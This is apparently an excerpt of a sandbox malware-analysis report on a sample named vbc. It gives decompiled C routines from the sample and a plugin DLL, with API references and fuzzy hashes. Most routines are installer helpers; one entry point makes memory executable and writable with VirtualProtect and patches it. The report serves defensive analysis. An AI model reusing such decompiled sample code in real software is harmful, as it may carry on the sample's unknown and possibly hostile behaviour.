                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CreateDirectoryErrorLast
                                                • String ID:
                                                • API String ID: 1375471231-0
                                                • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                • Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
                                                • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                • Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004060DF(void* _a4, void* _a8, long _a12) {
                                                				int _t7;
                                                				long _t11;
                                                
                                                				_t11 = _a12;
                                                				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                				if(_t7 == 0 || _t11 != _a12) {
                                                					return 0;
                                                				} else {
                                                					return 1;
                                                				}
                                                			}





                                                0x004060e3
                                                0x004060f3
                                                0x004060fb
                                                0x00000000
                                                0x00406102
                                                0x00000000
                                                0x00406104

                                                APIs
                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 004060F3
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: FileWrite
                                                • String ID:
                                                • API String ID: 3934441357-0
                                                • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                • Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
                                                • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                • Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004060B0(void* _a4, void* _a8, long _a12) {
                                                				int _t7;
                                                				long _t11;
                                                
                                                				_t11 = _a12;
                                                				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                				if(_t7 == 0 || _t11 != _a12) {
                                                					return 0;
                                                				} else {
                                                					return 1;
                                                				}
                                                			}





                                                0x004060b4
                                                0x004060c4
                                                0x004060cc
                                                0x00000000
                                                0x004060d3
                                                0x00000000
                                                0x004060d5

                                                APIs
                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 004060C4
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                • Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
                                                • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                • Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                
                                                				 *0x73285048 = _a4;
                                                				if(_a8 == 1) {
                                                					VirtualProtect(0x7328505c, 4, 0x40, 0x7328504c); // executed
                                                					 *0x7328505c = 0xc2;
                                                					 *0x7328504c = 0;
                                                					 *0x73285054 = 0;
                                                					 *0x73285068 = 0;
                                                					 *0x73285058 = 0;
                                                					 *0x73285050 = 0;
                                                					 *0x73285060 = 0;
                                                					 *0x7328505e = 0;
                                                				}
                                                				return 1;
                                                			}



                                                0x73282a88
                                                0x73282a8d
                                                0x73282a9d
                                                0x73282aa5
                                                0x73282aac
                                                0x73282ab1
                                                0x73282ab6
                                                0x73282abb
                                                0x73282ac0
                                                0x73282ac5
                                                0x73282aca
                                                0x73282aca
                                                0x73282ad2

                                                APIs
                                                • VirtualProtect.KERNELBASE(7328505C,00000004,00000040,7328504C), ref: 73282A9D
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680334815.0000000073281000.00000020.00000001.01000000.00000004.sdmp, Offset: 73280000, based on PE: true
                                                • Associated: 00000004.00000002.680330419.0000000073280000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680339813.0000000073284000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680344167.0000000073286000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_73280000_vbc.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 18192501db64f714e11d7cd9f9cd8ca328576567b7c94787a1122f2bb2438a4f
                                                • Instruction ID: 3419202e1bdb5233734e8f4527527fd308e964ab3c7eae402c6495640f95c01a
                                                • Opcode Fuzzy Hash: 18192501db64f714e11d7cd9f9cd8ca328576567b7c94787a1122f2bb2438a4f
                                                • Instruction Fuzzy Hash: E4F0A5F2504380DEC350EF2A84487893FE0B70C308B34C52AE19CEA281E3344084FF92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004044E5(int _a4) {
                                                				struct HWND__* _t2;
                                                				long _t3;
                                                
                                                				_t2 =  *0x433ed8;
                                                				if(_t2 != 0) {
                                                					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
                                                					return _t3;
                                                				}
                                                				return _t2;
                                                			}





                                                0x004044e5
                                                0x004044ec
                                                0x004044f7
                                                0x00000000
                                                0x004044f7
                                                0x004044fd

                                                APIs
                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                • Instruction ID: 729772cd993a62bf3dcd5a53f5ba0c6067f9c4589e443fe2cdcdd0dddf41cb53
                                                • Opcode Fuzzy Hash: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                • Instruction Fuzzy Hash: 74C04CB1740605BADA108B509D45F0677546750701F188429B641A50E0CA74E410D62C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004044CE(int _a4) {
                                                				long _t2;
                                                
                                                				_t2 = SendMessageW( *0x434f08, 0x28, _a4, 1); // executed
                                                				return _t2;
                                                			}




                                                0x004044dc
                                                0x004044e2

                                                APIs
                                                • SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                • Instruction ID: f9270ce27bc2d5d500308faa7c43699bdd9cec228278350af1c7ef3a72e6c056
                                                • Opcode Fuzzy Hash: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                • Instruction Fuzzy Hash: 4FB01235181A00FBDE514B00DE09F857E62F7E4701F058038F341240F0CBB200A4DB08
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004034E5(long _a4) {
                                                				long _t2;
                                                
                                                				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                				return _t2;
                                                			}




                                                0x004034f3
                                                0x004034f9

                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004044BB(int _a4) {
                                                				int _t2;
                                                
                                                				_t2 = EnableWindow( *0x42d264, _a4); // executed
                                                				return _t2;
                                                			}




                                                0x004044c5
                                                0x004044cb

                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(?,00404292), ref: 004044C5
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                • Instruction ID: 0db23a64e3c973129ccb7351ad80e5cfa0365495cc8a336c35755b545d17f2be
                                                • Opcode Fuzzy Hash: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                • Instruction Fuzzy Hash: 74A00275508601DBDE115B51DF09D057B71A7547017414579A18551034C6314461EB5D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 51%
                                                			E73282B98(void* __ecx, intOrPtr _a4) {
                                                				signed int _v8;
                                                				void* _t28;
                                                				void* _t29;
                                                				int _t33;
                                                				void* _t37;
                                                				void* _t40;
                                                				void* _t45;
                                                				void* _t49;
                                                				signed int _t56;
                                                				void* _t61;
                                                				void* _t70;
                                                				intOrPtr _t72;
                                                				signed int _t77;
                                                				intOrPtr _t79;
                                                				intOrPtr _t80;
                                                				void* _t81;
                                                				void* _t87;
                                                				void* _t88;
                                                				void* _t89;
                                                				void* _t90;
                                                				intOrPtr _t93;
                                                				intOrPtr _t94;
                                                
                                                				if( *0x73285050 != 0 && E73282ADB(_a4) == 0) {
                                                					 *0x73285054 = _t93;
                                                					if( *0x7328504c != 0) {
                                                						_t93 =  *0x7328504c;
                                                					} else {
                                                						E732830C0(E73282AD5(), __ecx);
                                                						 *0x7328504c = _t93;
                                                					}
                                                				}
                                                				_t28 = E73282B09(_a4);
                                                				_t94 = _t93 + 4;
                                                				if(_t28 <= 0) {
                                                					L9:
                                                					_t29 = E73282AFD();
                                                					_t72 = _a4;
                                                					_t79 =  *0x73285058;
                                                					 *((intOrPtr*)(_t29 + _t72)) = _t79;
                                                					 *0x73285058 = _t72;
                                                					E73282AF7();
                                                					_t33 = CloseHandle(??); // executed
                                                					 *0x73285034 = _t33;
                                                					 *0x73285038 = _t79;
                                                					if( *0x73285050 != 0 && E73282ADB( *0x73285058) == 0) {
                                                						 *0x7328504c = _t94;
                                                						_t94 =  *0x73285054;
                                                					}
                                                					_t80 =  *0x73285058;
                                                					_a4 = _t80;
                                                					 *0x73285058 =  *((intOrPtr*)(E73282AFD() + _t80));
                                                					_t37 = E73282AE9(_t80);
                                                					_pop(_t81);
                                                					if(_t37 != 0) {
                                                						_t40 = E73282B09(_t81);
                                                						if(_t40 > 0) {
                                                							_push(_t40);
                                                							_push(E73282B14() + _a4 + _v8);
                                                							_push(E73282B1E());
                                                							if( *0x73285050 <= 0 || E73282ADB(_a4) != 0) {
                                                								_pop(_t88);
                                                								_pop(_t45);
                                                								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
                                                								if(__eflags == 0) {
                                                								}
                                                								asm("loop 0xfffffff5");
                                                							} else {
                                                								_pop(_t89);
                                                								_pop(_t49);
                                                								 *0x7328504c =  *0x7328504c +  *(_t89 + _t49) * 4;
                                                								asm("loop 0xffffffeb");
                                                							}
                                                						}
                                                					}
                                                					_t107 =  *0x73285058;
                                                					if( *0x73285058 == 0) {
                                                						 *0x7328504c = 0;
                                                					}
                                                					E73282B42(_t107, _a4,  *0x73285034,  *0x73285038);
                                                					return _a4;
                                                				}
                                                				_push(E73282B14() + _a4);
                                                				_t56 = E73282B1A();
                                                				_v8 = _t56;
                                                				_t77 = _t28;
                                                				_push(_t68 + _t56 * _t77);
                                                				_t70 = E73282B26();
                                                				_t87 = E73282B22();
                                                				_t90 = E73282B1E();
                                                				_t61 = _t77;
                                                				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
                                                					_push( *((intOrPtr*)(_t70 + _t61)));
                                                				}
                                                				_push( *((intOrPtr*)(_t87 + _t61)));
                                                				asm("loop 0xfffffff1");
                                                				goto L9;
                                                			}

























                                                0x73282ba8
                                                0x73282bb9
                                                0x73282bc6
                                                0x73282bda
                                                0x73282bc8
                                                0x73282bcd
                                                0x73282bd2
                                                0x73282bd2
                                                0x73282bc6
                                                0x73282be3
                                                0x73282be8
                                                0x73282bee
                                                0x73282c32
                                                0x73282c32
                                                0x73282c37
                                                0x73282c3c
                                                0x73282c42
                                                0x73282c44
                                                0x73282c4a
                                                0x73282c57
                                                0x73282c59
                                                0x73282c5e
                                                0x73282c6b
                                                0x73282c7e
                                                0x73282c84
                                                0x73282c8a
                                                0x73282c8b
                                                0x73282c91
                                                0x73282c9d
                                                0x73282ca3
                                                0x73282cab
                                                0x73282cac
                                                0x73282caf
                                                0x73282cba
                                                0x73282cbc
                                                0x73282cc8
                                                0x73282cce
                                                0x73282cd6
                                                0x73282d02
                                                0x73282d03
                                                0x73282d05
                                                0x73282d09
                                                0x73282d09
                                                0x73282d10
                                                0x73282ce6
                                                0x73282ce6
                                                0x73282ce7
                                                0x73282cf5
                                                0x73282cfe
                                                0x73282cfe
                                                0x73282cd6
                                                0x73282cba
                                                0x73282d12
                                                0x73282d19
                                                0x73282d1b
                                                0x73282d1b
                                                0x73282d34
                                                0x73282d42
                                                0x73282d42
                                                0x73282bf9
                                                0x73282bfa
                                                0x73282bff
                                                0x73282c03
                                                0x73282c08
                                                0x73282c1c
                                                0x73282c1d
                                                0x73282c1e
                                                0x73282c20
                                                0x73282c25
                                                0x73282c27
                                                0x73282c27
                                                0x73282c2a
                                                0x73282c30
                                                0x00000000

                                                APIs
                                                • CloseHandle.KERNELBASE(00000000), ref: 73282C57
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680334815.0000000073281000.00000020.00000001.01000000.00000004.sdmp, Offset: 73280000, based on PE: true
                                                • Associated: 00000004.00000002.680330419.0000000073280000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680339813.0000000073284000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680344167.0000000073286000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_73280000_vbc.jbxd
                                                Similarity
                                                • API ID: CloseHandle
                                                • String ID:
                                                • API String ID: 2962429428-0
                                                • Opcode ID: 1ef657144265ada7ba89caecc7987b40626885b2f78e7071c69b6852bb5133c2
                                                • Instruction ID: 59cb301e01e44a24428ca593fe932c69135fc46e8443f646d0e4f4e4cf57d30a
                                                • Opcode Fuzzy Hash: 1ef657144265ada7ba89caecc7987b40626885b2f78e7071c69b6852bb5133c2
                                                • Instruction Fuzzy Hash: B54190B250030DDFEB11EF69D988BD97BB9EB48314F34C426E409D61C0D67994C0AB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E732812BB() {
                                                				void* _t3;
                                                
                                                				_t3 = GlobalAlloc(0x40,  *0x7328506c +  *0x7328506c); // executed
                                                				return _t3;
                                                			}




                                                0x732812c5
                                                0x732812cb

                                                APIs
                                                • GlobalAlloc.KERNELBASE(00000040,?,732812DB,?,7328137F,00000019,732811CA,-000000A0), ref: 732812C5
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680334815.0000000073281000.00000020.00000001.01000000.00000004.sdmp, Offset: 73280000, based on PE: true
                                                • Associated: 00000004.00000002.680330419.0000000073280000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680339813.0000000073284000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680344167.0000000073286000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_73280000_vbc.jbxd
                                                Similarity
                                                • API ID: AllocGlobal
                                                • String ID:
                                                • API String ID: 3761449716-0
                                                • Opcode ID: 6fcd43f00682317228415e08771684b88c5ae402de62d51412d9cbaff8acb8b9
                                                • Instruction ID: f478329390f1e9c3e9af267b28f4bb7edd30c35185d8bed6e2e48c0aa9cfcfd0
                                                • Opcode Fuzzy Hash: 6fcd43f00682317228415e08771684b88c5ae402de62d51412d9cbaff8acb8b9
                                                • Instruction Fuzzy Hash: 00B012B2A00120DFEE00AB65CC0EF7536D4E704301F24C000FA08C0181C12048009536
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E0040498A(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				long _v16;
                                                				long _v20;
                                                				long _v24;
                                                				char _v28;
                                                				intOrPtr _v32;
                                                				long _v36;
                                                				char _v40;
                                                				unsigned int _v44;
                                                				signed int _v48;
                                                				WCHAR* _v56;
                                                				intOrPtr _v60;
                                                				intOrPtr _v64;
                                                				intOrPtr _v68;
                                                				WCHAR* _v72;
                                                				void _v76;
                                                				struct HWND__* _v80;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				intOrPtr _t82;
                                                				long _t87;
                                                				short* _t89;
                                                				void* _t95;
                                                				signed int _t96;
                                                				int _t109;
                                                				signed short _t114;
                                                				signed int _t118;
                                                				struct HWND__** _t122;
                                                				intOrPtr* _t138;
                                                				WCHAR* _t146;
                                                				unsigned int _t150;
                                                				signed int _t152;
                                                				unsigned int _t156;
                                                				signed int _t158;
                                                				signed int* _t159;
                                                				signed int* _t160;
                                                				struct HWND__* _t166;
                                                				struct HWND__* _t167;
                                                				int _t169;
                                                				unsigned int _t197;
                                                
                                                				_t156 = __edx;
                                                				_t82 =  *0x42c240; // 0x900bec
                                                				_v32 = _t82;
                                                				_t2 = _t82 + 0x3c; // 0x0
                                                				_t3 = _t82 + 0x38; // 0x0
                                                				_t146 = ( *_t2 << 0xb) + 0x436000;
                                                				_v12 =  *_t3;
                                                				if(_a8 == 0x40b) {
                                                					E00405B81(0x3fb, _t146);
                                                					E004067C4(_t146);
                                                				}
                                                				_t167 = _a4;
                                                				if(_a8 != 0x110) {
                                                					L8:
                                                					if(_a8 != 0x111) {
                                                						L20:
                                                						if(_a8 == 0x40f) {
                                                							L22:
                                                							_v8 = _v8 & 0x00000000;
                                                							_v12 = _v12 & 0x00000000;
                                                							E00405B81(0x3fb, _t146);
                                                							if(E00405F14(_t186, _t146) == 0) {
                                                								_v8 = 1;
                                                							}
                                                							E0040653D(0x42b238, _t146);
                                                							_t87 = E0040690A(1);
                                                							_v16 = _t87;
                                                							if(_t87 == 0) {
                                                								L30:
                                                								E0040653D(0x42b238, _t146);
                                                								_t89 = E00405EB7(0x42b238);
                                                								_t158 = 0;
                                                								if(_t89 != 0) {
                                                									 *_t89 = 0;
                                                								}
                                                								if(GetDiskFreeSpaceW(0x42b238,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                									goto L35;
                                                								} else {
                                                									_t169 = 0x400;
                                                									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                									asm("cdq");
                                                									_v48 = _t109;
                                                									_v44 = _t156;
                                                									_v12 = 1;
                                                									goto L36;
                                                								}
                                                							} else {
                                                								_t159 = 0;
                                                								if(0 == 0x42b238) {
                                                									goto L30;
                                                								} else {
                                                									goto L26;
                                                								}
                                                								while(1) {
                                                									L26:
                                                									_t114 = _v16(0x42b238,  &_v48,  &_v28,  &_v40);
                                                									if(_t114 != 0) {
                                                										break;
                                                									}
                                                									if(_t159 != 0) {
                                                										 *_t159 =  *_t159 & _t114;
                                                									}
                                                									_t160 = E00405E58(0x42b238);
                                                									 *_t160 =  *_t160 & 0x00000000;
                                                									_t159 = _t160;
                                                									 *_t159 = 0x5c;
                                                									if(_t159 != 0x42b238) {
                                                										continue;
                                                									} else {
                                                										goto L30;
                                                									}
                                                								}
                                                								_t150 = _v44;
                                                								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                								_v44 = _t150 >> 0xa;
                                                								_v12 = 1;
                                                								_t158 = 0;
                                                								__eflags = 0;
                                                								L35:
                                                								_t169 = 0x400;
                                                								L36:
                                                								_t95 = E00404E27(5);
                                                								if(_v12 != _t158) {
                                                									_t197 = _v44;
                                                									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                										_v8 = 2;
                                                									}
                                                								}
                                                								if( *((intOrPtr*)( *0x433edc + 0x10)) != _t158) {
                                                									E00404E0F(0x3ff, 0xfffffffb, _t95);
                                                									if(_v12 == _t158) {
                                                										SetDlgItemTextW(_a4, _t169, 0x42b228);
                                                									} else {
                                                										E00404D46(_t169, 0xfffffffc, _v48, _v44);
                                                									}
                                                								}
                                                								_t96 = _v8;
                                                								 *0x434fa4 = _t96;
                                                								if(_t96 == _t158) {
                                                									_v8 = E0040140B(7);
                                                								}
                                                								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                									_v8 = _t158;
                                                								}
                                                								E004044BB(0 | _v8 == _t158);
                                                								if(_v8 == _t158 &&  *0x42d258 == _t158) {
                                                									E004048E3();
                                                								}
                                                								 *0x42d258 = _t158;
                                                								goto L53;
                                                							}
                                                						}
                                                						_t186 = _a8 - 0x405;
                                                						if(_a8 != 0x405) {
                                                							goto L53;
                                                						}
                                                						goto L22;
                                                					}
                                                					_t118 = _a12 & 0x0000ffff;
                                                					if(_t118 != 0x3fb) {
                                                						L12:
                                                						if(_t118 == 0x3e9) {
                                                							_t152 = 7;
                                                							memset( &_v76, 0, _t152 << 2);
                                                							_v80 = _t167;
                                                							_v72 = 0x42d268;
                                                							_v60 = E00404CE0;
                                                							_v56 = _t146;
                                                							_v68 = E0040657A(_t146, 0x42d268, _t167, 0x42ba40, _v12);
                                                							_t122 =  &_v80;
                                                							_v64 = 0x41;
                                                							__imp__SHBrowseForFolderW(_t122);
                                                							if(_t122 == 0) {
                                                								_a8 = 0x40f;
                                                							} else {
                                                								__imp__CoTaskMemFree(_t122);
                                                								E00405E0C(_t146);
                                                								_t125 =  *((intOrPtr*)( *0x434f10 + 0x11c));
                                                								if( *((intOrPtr*)( *0x434f10 + 0x11c)) != 0 && _t146 == 0x440800) {
                                                									E0040657A(_t146, 0x42d268, _t167, 0, _t125);
                                                									if(lstrcmpiW(0x432ea0, 0x42d268) != 0) {
                                                										lstrcatW(_t146, 0x432ea0);
                                                									}
                                                								}
                                                								 *0x42d258 =  *0x42d258 + 1;
                                                								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                							}
                                                						}
                                                						goto L20;
                                                					}
                                                					if(_a12 >> 0x10 != 0x300) {
                                                						goto L53;
                                                					}
                                                					_a8 = 0x40f;
                                                					goto L12;
                                                				} else {
                                                					_t166 = GetDlgItem(_t167, 0x3fb);
                                                					if(E00405E83(_t146) != 0 && E00405EB7(_t146) == 0) {
                                                						E00405E0C(_t146);
                                                					}
                                                					 *0x433ed8 = _t167;
                                                					SetWindowTextW(_t166, _t146);
